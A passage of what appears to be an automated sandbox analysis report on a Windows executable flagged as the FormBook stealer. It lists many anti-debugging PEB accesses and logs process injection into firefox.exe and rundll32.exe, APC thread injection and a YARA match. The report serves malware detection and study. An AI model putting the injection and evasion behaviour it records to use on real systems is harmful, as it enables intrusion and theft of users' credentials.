        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357C0680 mov eax, dword ptr fs:[00000030h]2_2_357C0680
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357C0680 mov eax, dword ptr fs:[00000030h]2_2_357C0680
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357C0680 mov eax, dword ptr fs:[00000030h]2_2_357C0680
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357C0680 mov eax, dword ptr fs:[00000030h]2_2_357C0680
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357C0680 mov eax, dword ptr fs:[00000030h]2_2_357C0680
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357C0680 mov eax, dword ptr fs:[00000030h]2_2_357C0680
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357C0680 mov eax, dword ptr fs:[00000030h]2_2_357C0680
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357C0680 mov eax, dword ptr fs:[00000030h]2_2_357C0680
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357C0680 mov eax, dword ptr fs:[00000030h]2_2_357C0680
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357C0680 mov eax, dword ptr fs:[00000030h]2_2_357C0680
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357B6179 mov eax, dword ptr fs:[00000030h]2_2_357B6179
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357E716D mov eax, dword ptr fs:[00000030h]2_2_357E716D
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357E415F mov eax, dword ptr fs:[00000030h]2_2_357E415F
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357AA147 mov eax, dword ptr fs:[00000030h]2_2_357AA147
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357AA147 mov eax, dword ptr fs:[00000030h]2_2_357AA147
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357AA147 mov eax, dword ptr fs:[00000030h]2_2_357AA147
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_358851B6 mov eax, dword ptr fs:[00000030h]2_2_358851B6
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357E7128 mov eax, dword ptr fs:[00000030h]2_2_357E7128
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357E7128 mov eax, dword ptr fs:[00000030h]2_2_357E7128
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357E0118 mov eax, dword ptr fs:[00000030h]2_2_357E0118
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357AF113 mov eax, dword ptr fs:[00000030h]2_2_357AF113
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357AF113 mov eax, dword ptr fs:[00000030h]2_2_357AF113
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357AF113 mov eax, dword ptr fs:[00000030h]2_2_357AF113
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357AF113 mov eax, dword ptr fs:[00000030h]2_2_357AF113
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357AF113 mov eax, dword ptr fs:[00000030h]2_2_357AF113
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357AF113 mov eax, dword ptr fs:[00000030h]2_2_357AF113
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357AF113 mov eax, dword ptr fs:[00000030h]2_2_357AF113
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357AF113 mov eax, dword ptr fs:[00000030h]2_2_357AF113
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357AF113 mov eax, dword ptr fs:[00000030h]2_2_357AF113
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357AF113 mov eax, dword ptr fs:[00000030h]2_2_357AF113
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357AF113 mov eax, dword ptr fs:[00000030h]2_2_357AF113
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357AF113 mov eax, dword ptr fs:[00000030h]2_2_357AF113
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357AF113 mov eax, dword ptr fs:[00000030h]2_2_357AF113
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357AF113 mov eax, dword ptr fs:[00000030h]2_2_357AF113
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357AF113 mov eax, dword ptr fs:[00000030h]2_2_357AF113
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357AF113 mov eax, dword ptr fs:[00000030h]2_2_357AF113
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357AF113 mov eax, dword ptr fs:[00000030h]2_2_357AF113
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357AF113 mov eax, dword ptr fs:[00000030h]2_2_357AF113
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357AF113 mov eax, dword ptr fs:[00000030h]2_2_357AF113
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357AF113 mov eax, dword ptr fs:[00000030h]2_2_357AF113
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357AF113 mov eax, dword ptr fs:[00000030h]2_2_357AF113
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_358781EE mov eax, dword ptr fs:[00000030h]2_2_358781EE
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_358781EE mov eax, dword ptr fs:[00000030h]2_2_358781EE
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357D510F mov eax, dword ptr fs:[00000030h]2_2_357D510F
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357D510F mov eax, dword ptr fs:[00000030h]2_2_357D510F
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357D510F mov eax, dword ptr fs:[00000030h]2_2_357D510F
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357D510F mov eax, dword ptr fs:[00000030h]2_2_357D510F
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357D510F mov eax, dword ptr fs:[00000030h]2_2_357D510F
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357D510F mov eax, dword ptr fs:[00000030h]2_2_357D510F
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357D510F mov eax, dword ptr fs:[00000030h]2_2_357D510F
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357D510F mov eax, dword ptr fs:[00000030h]2_2_357D510F
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357D510F mov eax, dword ptr fs:[00000030h]2_2_357D510F
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357D510F mov eax, dword ptr fs:[00000030h]2_2_357D510F
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357D510F mov eax, dword ptr fs:[00000030h]2_2_357D510F
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357D510F mov eax, dword ptr fs:[00000030h]2_2_357D510F
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357D510F mov eax, dword ptr fs:[00000030h]2_2_357D510F
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357B510D mov eax, dword ptr fs:[00000030h]2_2_357B510D
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357A91F0 mov eax, dword ptr fs:[00000030h]2_2_357A91F0
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357A91F0 mov eax, dword ptr fs:[00000030h]2_2_357A91F0
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357C01F1 mov eax, dword ptr fs:[00000030h]2_2_357C01F1
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357C01F1 mov eax, dword ptr fs:[00000030h]2_2_357C01F1
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357C01F1 mov eax, dword ptr fs:[00000030h]2_2_357C01F1
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357DF1F0 mov eax, dword ptr fs:[00000030h]2_2_357DF1F0
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357DF1F0 mov eax, dword ptr fs:[00000030h]2_2_357DF1F0
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357A81EB mov eax, dword ptr fs:[00000030h]2_2_357A81EB
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357BA1E3 mov eax, dword ptr fs:[00000030h]2_2_357BA1E3
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357BA1E3 mov eax, dword ptr fs:[00000030h]2_2_357BA1E3
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357BA1E3 mov eax, dword ptr fs:[00000030h]2_2_357BA1E3
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357BA1E3 mov eax, dword ptr fs:[00000030h]2_2_357BA1E3
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357BA1E3 mov eax, dword ptr fs:[00000030h]2_2_357BA1E3
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357DB1E0 mov eax, dword ptr fs:[00000030h]2_2_357DB1E0
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357DB1E0 mov eax, dword ptr fs:[00000030h]2_2_357DB1E0
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357DB1E0 mov eax, dword ptr fs:[00000030h]2_2_357DB1E0
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357DB1E0 mov eax, dword ptr fs:[00000030h]2_2_357DB1E0
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357DB1E0 mov eax, dword ptr fs:[00000030h]2_2_357DB1E0
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357DB1E0 mov eax, dword ptr fs:[00000030h]2_2_357DB1E0
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357DB1E0 mov eax, dword ptr fs:[00000030h]2_2_357DB1E0
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357B91E5 mov eax, dword ptr fs:[00000030h]2_2_357B91E5
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357B91E5 mov eax, dword ptr fs:[00000030h]2_2_357B91E5
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_3583A130 mov eax, dword ptr fs:[00000030h]2_2_3583A130
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_3586F13E mov eax, dword ptr fs:[00000030h]2_2_3586F13E
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357C01C0 mov eax, dword ptr fs:[00000030h]2_2_357C01C0
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357C01C0 mov eax, dword ptr fs:[00000030h]2_2_357C01C0
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357C51C0 mov eax, dword ptr fs:[00000030h]2_2_357C51C0
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357C51C0 mov eax, dword ptr fs:[00000030h]2_2_357C51C0
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357C51C0 mov eax, dword ptr fs:[00000030h]2_2_357C51C0
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357C51C0 mov eax, dword ptr fs:[00000030h]2_2_357C51C0
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357E31BE mov eax, dword ptr fs:[00000030h]2_2_357E31BE
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357E31BE mov eax, dword ptr fs:[00000030h]2_2_357E31BE
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_35885149 mov eax, dword ptr fs:[00000030h]2_2_35885149
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357E41BB mov ecx, dword ptr fs:[00000030h]2_2_357E41BB
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357E41BB mov eax, dword ptr fs:[00000030h]2_2_357E41BB
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357E41BB mov eax, dword ptr fs:[00000030h]2_2_357E41BB
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_3584314A mov eax, dword ptr fs:[00000030h]2_2_3584314A
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_3584314A mov eax, dword ptr fs:[00000030h]2_2_3584314A
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_3584314A mov eax, dword ptr fs:[00000030h]2_2_3584314A
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_3584314A mov eax, dword ptr fs:[00000030h]2_2_3584314A
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357EE1A4 mov eax, dword ptr fs:[00000030h]2_2_357EE1A4
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357EE1A4 mov eax, dword ptr fs:[00000030h]2_2_357EE1A4
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_35883157 mov eax, dword ptr fs:[00000030h]2_2_35883157
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_35883157 mov eax, dword ptr fs:[00000030h]2_2_35883157
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_35883157 mov eax, dword ptr fs:[00000030h]2_2_35883157
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357D9194 mov eax, dword ptr fs:[00000030h]2_2_357D9194
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357F1190 mov eax, dword ptr fs:[00000030h]2_2_357F1190
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357F1190 mov eax, dword ptr fs:[00000030h]2_2_357F1190
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_3580717A mov eax, dword ptr fs:[00000030h]2_2_3580717A
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_3580717A mov eax, dword ptr fs:[00000030h]2_2_3580717A
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357B4180 mov eax, dword ptr fs:[00000030h]2_2_357B4180
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357B4180 mov eax, dword ptr fs:[00000030h]2_2_357B4180
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357B4180 mov eax, dword ptr fs:[00000030h]2_2_357B4180
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_35884080 mov eax, dword ptr fs:[00000030h]2_2_35884080
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_35884080 mov eax, dword ptr fs:[00000030h]2_2_35884080
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_35884080 mov eax, dword ptr fs:[00000030h]2_2_35884080
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_35884080 mov eax, dword ptr fs:[00000030h]2_2_35884080
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_35884080 mov eax, dword ptr fs:[00000030h]2_2_35884080
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_35884080 mov eax, dword ptr fs:[00000030h]2_2_35884080
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_35884080 mov eax, dword ptr fs:[00000030h]2_2_35884080
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357B7072 mov eax, dword ptr fs:[00000030h]2_2_357B7072
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357B6074 mov eax, dword ptr fs:[00000030h]2_2_357B6074
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357B6074 mov eax, dword ptr fs:[00000030h]2_2_357B6074
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_3585F0A5 mov eax, dword ptr fs:[00000030h]2_2_3585F0A5
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_3585F0A5 mov eax, dword ptr fs:[00000030h]2_2_3585F0A5
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_3585F0A5 mov eax, dword ptr fs:[00000030h]2_2_3585F0A5
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_3585F0A5 mov eax, dword ptr fs:[00000030h]2_2_3585F0A5
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_3585F0A5 mov eax, dword ptr fs:[00000030h]2_2_3585F0A5
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_3585F0A5 mov eax, dword ptr fs:[00000030h]2_2_3585F0A5
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_3585F0A5 mov eax, dword ptr fs:[00000030h]2_2_3585F0A5
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_3586B0AF mov eax, dword ptr fs:[00000030h]2_2_3586B0AF
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357B1051 mov eax, dword ptr fs:[00000030h]2_2_357B1051
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357B1051 mov eax, dword ptr fs:[00000030h]2_2_357B1051
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357E0044 mov eax, dword ptr fs:[00000030h]2_2_357E0044
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_358850B7 mov eax, dword ptr fs:[00000030h]2_2_358850B7
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357AD02D mov eax, dword ptr fs:[00000030h]2_2_357AD02D
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357B8009 mov eax, dword ptr fs:[00000030h]2_2_357B8009
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357D5004 mov eax, dword ptr fs:[00000030h]2_2_357D5004
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357D5004 mov ecx, dword ptr fs:[00000030h]2_2_357D5004
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357A90F8 mov eax, dword ptr fs:[00000030h]2_2_357A90F8
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357A90F8 mov eax, dword ptr fs:[00000030h]2_2_357A90F8
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357A90F8 mov eax, dword ptr fs:[00000030h]2_2_357A90F8
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357A90F8 mov eax, dword ptr fs:[00000030h]2_2_357A90F8
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357AC0F6 mov eax, dword ptr fs:[00000030h]2_2_357AC0F6
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357ED0F0 mov eax, dword ptr fs:[00000030h]2_2_357ED0F0
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357ED0F0 mov ecx, dword ptr fs:[00000030h]2_2_357ED0F0
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357CB0D0 mov eax, dword ptr fs:[00000030h]2_2_357CB0D0
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357AB0D6 mov eax, dword ptr fs:[00000030h]2_2_357AB0D6
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357AB0D6 mov eax, dword ptr fs:[00000030h]2_2_357AB0D6
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357AB0D6 mov eax, dword ptr fs:[00000030h]2_2_357AB0D6
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357AB0D6 mov eax, dword ptr fs:[00000030h]2_2_357AB0D6
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_3588505B mov eax, dword ptr fs:[00000030h]2_2_3588505B
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357F00A5 mov eax, dword ptr fs:[00000030h]2_2_357F00A5
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_35859060 mov eax, dword ptr fs:[00000030h]2_2_35859060
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357AA093 mov ecx, dword ptr fs:[00000030h]2_2_357AA093
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357AC090 mov eax, dword ptr fs:[00000030h]2_2_357AC090
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357D237A mov eax, dword ptr fs:[00000030h]2_2_357D237A
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_3586F38A mov eax, dword ptr fs:[00000030h]2_2_3586F38A
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357BB360 mov eax, dword ptr fs:[00000030h]2_2_357BB360
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357BB360 mov eax, dword ptr fs:[00000030h]2_2_357BB360
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357BB360 mov eax, dword ptr fs:[00000030h]2_2_357BB360
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357BB360 mov eax, dword ptr fs:[00000030h]2_2_357BB360
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357BB360 mov eax, dword ptr fs:[00000030h]2_2_357BB360
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357BB360 mov eax, dword ptr fs:[00000030h]2_2_357BB360
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357EE363 mov eax, dword ptr fs:[00000030h]2_2_357EE363
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357EE363 mov eax, dword ptr fs:[00000030h]2_2_357EE363
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357EE363 mov eax, dword ptr fs:[00000030h]2_2_357EE363
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357EE363 mov eax, dword ptr fs:[00000030h]2_2_357EE363
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357EE363 mov eax, dword ptr fs:[00000030h]2_2_357EE363
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357EE363 mov eax, dword ptr fs:[00000030h]2_2_357EE363
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357EE363 mov eax, dword ptr fs:[00000030h]2_2_357EE363
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357EE363 mov eax, dword ptr fs:[00000030h]2_2_357EE363
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357EA350 mov eax, dword ptr fs:[00000030h]2_2_357EA350
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_3582C3B0 mov eax, dword ptr fs:[00000030h]2_2_3582C3B0
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357A8347 mov eax, dword ptr fs:[00000030h]2_2_357A8347
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357A8347 mov eax, dword ptr fs:[00000030h]2_2_357A8347
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357A8347 mov eax, dword ptr fs:[00000030h]2_2_357A8347
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357D332D mov eax, dword ptr fs:[00000030h]2_2_357D332D
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357AE328 mov eax, dword ptr fs:[00000030h]2_2_357AE328
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357AE328 mov eax, dword ptr fs:[00000030h]2_2_357AE328
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357AE328 mov eax, dword ptr fs:[00000030h]2_2_357AE328
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_358343D5 mov eax, dword ptr fs:[00000030h]2_2_358343D5
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357E8322 mov eax, dword ptr fs:[00000030h]2_2_357E8322
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357E8322 mov eax, dword ptr fs:[00000030h]2_2_357E8322
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357E8322 mov eax, dword ptr fs:[00000030h]2_2_357E8322
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357E631F mov eax, dword ptr fs:[00000030h]2_2_357E631F
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357CE310 mov eax, dword ptr fs:[00000030h]2_2_357CE310
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357CE310 mov eax, dword ptr fs:[00000030h]2_2_357CE310
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357CE310 mov eax, dword ptr fs:[00000030h]2_2_357CE310
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357A9303 mov eax, dword ptr fs:[00000030h]2_2_357A9303
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357A9303 mov eax, dword ptr fs:[00000030h]2_2_357A9303
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_3586F30A mov eax, dword ptr fs:[00000030h]2_2_3586F30A
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_3583330C mov eax, dword ptr fs:[00000030h]2_2_3583330C
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_3583330C mov eax, dword ptr fs:[00000030h]2_2_3583330C
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_3583330C mov eax, dword ptr fs:[00000030h]2_2_3583330C
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_3583330C mov eax, dword ptr fs:[00000030h]2_2_3583330C
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357E33D0 mov eax, dword ptr fs:[00000030h]2_2_357E33D0
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357E43D0 mov ecx, dword ptr fs:[00000030h]2_2_357E43D0
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357B63CB mov eax, dword ptr fs:[00000030h]2_2_357B63CB
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357AE3C0 mov eax, dword ptr fs:[00000030h]2_2_357AE3C0

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Injects a PE file into a foreign processes
        Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF7DF120000 value starts with: 4D5AJump to behavior
        Maps a DLL or memory area into another process
        Source: C:\Users\user\Desktop\Antndte.exeSection loaded: unknown target: C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe protection: execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\Antndte.exeSection loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and writeJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: unknown target: C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe protection: read writeJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: unknown target: C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe protection: execute and read and writeJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: unknown target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: unknown target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
        Queues an APC in another process (thread injection)
        Source: C:\Windows\SysWOW64\rundll32.exeThread APC queued: target process: C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exeJump to behavior
        Writes to foreign memory regions
        Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF7DF120000Jump to behavior
        Source: C:\Users\user\Desktop\Antndte.exeProcess created: C:\Users\user\Desktop\Antndte.exe C:\Users\user\Desktop\Antndte.exeJump to behavior
        Source: C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exeJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exeJump to behavior
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 0_2_00403373 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403373

        Stealing of Sensitive Information

        barindex
        Yara detected FormBook
        Source: Yara matchFile source: 00000005.00000002.14740359310.0000000002D40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.14739186182.00000000007F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
